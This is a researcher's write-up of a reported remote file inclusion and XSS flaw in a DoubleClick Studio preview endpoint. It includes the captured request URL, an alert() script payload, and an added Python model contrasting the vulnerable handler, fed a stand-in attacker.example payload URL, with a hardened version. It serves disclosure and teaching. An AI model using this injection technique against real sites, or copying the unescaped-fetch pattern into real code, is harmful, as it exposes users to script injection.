Reporting a vulnerability to Google in one of their web applications
It’s very interesting to discover a vulnerability in a famous, high-profile website that is used by millions of users every day. And it’s even more interesting to be rewarded for it and get your name listed in the hall of fame for security researchers. That is exactly what happened to me after reporting a vulnerability to Google in one of their web applications. Allow me to share the full story with you.
The story started when I was doing some research on Google’s web services and products. I noticed a service called “DoubleClick”, the subsidiary of Google that develops and provides Internet ad services for marketers and agencies. I followed the link to the service on www.google.com/doubleclick and started reading more about it, then I used Google search to look for it in more depth. From the search results I was able to identify a domain called doubleclick.com and some other subdomains related to it, like “advertisers.doubleclick.net” and “studio.doubleclick.com”. Then I started running my favorite web penetration testing tool, Burp Suite, which captures all the requests made by the browser. I visited these domains and started browsing the pages of the website while Burp Suite was capturing all the requests, and suddenly, on one of the pages, I captured an Ajax request made to the link:
http://studio.doubleclick.com/ajax/externalpreviewiframe?h=DGFNAqXtFFxz4P4XUfRQpQ%3D%3D%0D%0A&height=0&&id=348635&isHTML5Preview=true&previewUrl=&studioDomain=.net&view=1ajax/externalpreviewiframe?view=1&width=0
I opened the link in the browser but wasn’t able to see anything interesting in it. When I looked at the link’s parameters, though, I noticed a query string parameter called “previewUrl” which had no value. From its name I guessed that it was meant to hold the URL of some page, so I thought: why not try playing with it?
I gave it a value like http://twitter.com/robots.txt and guess what? Wow, it fetched the robots.txt file and showed it in the page source. So it could include any remote file from any URL and print its contents in the same page, in the same context as the DoubleClick domain.
So I tried to include a URL for a file containing JavaScript code like <script>alert(‘Hello’)</script>, and yes, it worked smoothly: I could see the alert from the page saying HELLO!
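To make the defect concrete, here is an added illustration that is not code from the original post or from DoubleClick (the real handler’s source was never published): a small Python model of the previewUrl behaviour described above, beside a hardened version of the same endpoint. The remote fetch is simulated with an in-memory table so it runs offline, the query strings are constructed, and the allowlist host previews.example.net is a placeholder name.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the remote fetch so the example runs offline;
# a real handler would make an outbound HTTP request here.
FAKE_REMOTE = {
    "http://twitter.com/robots.txt": "User-agent: *\nDisallow: /search\n",
    "http://attacker.example/payload.html": "<script>alert('Hello')</script>",
    "https://previews.example.net/creative.html": "<b>Creative</b><script>alert(1)</script>",
}


def fetch(url):
    """Stand-in for the server-side fetch of the preview URL (constructed data)."""
    return FAKE_REMOTE.get(url, "")


def parse_query(query_string):
    """Return the first value of each query parameter, keeping empty ones
    (an empty previewUrl= is exactly what the captured request showed)."""
    raw = parse_qs(query_string, keep_blank_values=True)
    return {k: v[0] for k, v in raw.items()}


def vulnerable_preview(query_string):
    """Behaviour the post describes: whatever previewUrl names is fetched
    server-side and written into the page unescaped, so remote content is
    rendered, and any script in it runs, in the serving domain's origin."""
    params = parse_query(query_string)
    url = params.get("previewUrl", "")
    if not url:
        return '<div id="preview"></div>'
    return '<div id="preview">' + fetch(url) + "</div>"


# Hypothetical allowlist of first-party hosts a preview may be loaded from.
ALLOWED_HOSTS = {"previews.example.net"}


def hardened_preview(query_string):
    """Two independent fixes: only fetch from an allowlisted https host (so the
    endpoint cannot be used to pull arbitrary remote files), and never write
    fetched bytes into HTML unescaped (so whatever is fetched cannot execute)."""
    params = parse_query(query_string)
    url = params.get("previewUrl", "")
    if not url:
        return '<div id="preview"></div>'
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        # Reject before fetching: the server never contacts an arbitrary host.
        return '<div id="preview">preview URL not permitted</div>'
    return '<div id="preview"><pre>' + html.escape(fetch(url)) + "</pre></div>"


if __name__ == "__main__":
    # Constructed query string modelled on the captured request.
    q = "height=0&id=348635&isHTML5Preview=true&previewUrl=http://attacker.example/payload.html&view=1"
    print(vulnerable_preview(q))
    print(hardened_preview(q))
```

The two checks in hardened_preview address two different risks: the host allowlist stops the server from being used as a fetcher for arbitrary URLs (the remote file inclusion), and escaping the fetched body stops anything that is fetched from being interpreted as markup or script in the site’s own origin (the XSS). Either one alone leaves the other problem in place.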
So now I had a remote file inclusion plus cross-site scripting (XSS); why wait? I immediately reported the vulnerability to Google and sent them the proof of concept and a demonstration of the vulnerability. After 2 days I got an email from Google Security saying “Nice Catch!” and notifying me that they had confirmed the presence of the deficiency and were working to fix it.
After 5 days I received another mail saying that the vulnerability was eligible for a reward and that they would like to list my name in the Google hall of fame. Needless to say, I felt really happy and proud to be able to contribute and help the Google security team.
My recommendations:
1) Never ignore any web page that has inputs or parameters while you are doing a web penetration test, because even if the page doesn’t show anything interesting, it may still be vulnerable.
2) The Google Security Team is really fast at responding to security issues compared to other companies, which may reply to your initial report after 2 months.
3) If you discover a bug in a website like Google, never share it with anyone else and don’t disclose it before it gets fully patched. Otherwise you will be blamed and won’t receive a reward from the vendor.
About The Author
Ahmed Aboul Ela, Cyber Security Analyst at EG-CERT